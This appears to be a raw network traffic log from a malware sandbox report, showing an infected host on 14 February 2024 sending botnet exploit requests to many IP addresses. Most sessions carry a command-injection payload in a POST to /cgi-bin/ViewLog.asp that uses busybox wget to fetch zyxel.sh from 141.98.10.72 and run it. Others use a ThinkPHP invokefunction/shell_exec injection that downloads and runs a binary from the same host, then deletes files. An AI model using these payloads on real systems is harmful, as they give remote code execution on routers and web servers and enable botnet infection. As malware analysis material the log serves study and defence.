                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        918192.168.2.145619462.72.166.1058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.399223089 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        919192.168.2.144783288.221.143.13280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.446656942 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:03.649785042 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:03 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:03 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 61 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 37 30 33 26 23 34 36 3b 31 63 63 66 33 32 65 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c5a1602&#46;1707899703&#46;1ccf32ec</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        920192.168.2.143499088.221.28.8180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.505075932 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:03.733467102 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:03 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:03 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 34 35 30 38 63 34 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 30 33 26 23 34 36 3b 31 66 38 34 30 66 66 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e4508c4f&#46;1707899703&#46;1f840ff2</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        921192.168.2.144836288.86.201.9680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.531263113 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:03.787106037 CET364INHTTP/1.1 505 HTTP Version not supported
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 140
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        922192.168.2.145107294.219.91.1288080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.613903046 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        923192.168.2.143414262.238.151.1658080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.614995003 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:03.833225965 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 14:02:47 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        924192.168.2.143627095.85.191.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.748325109 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        925192.168.2.145954694.120.108.578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.765558958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        926192.168.2.145897262.29.101.1158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:03.765594006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        927192.168.2.145242031.136.207.1478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.366583109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.620079041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:13.763858080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.795273066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.882232904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        928192.168.2.144288031.136.72.1478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.366712093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.620070934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:13.763885021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.795284033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.882229090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        929192.168.2.144050031.136.239.48080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.372860909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.620101929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:13.763890028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
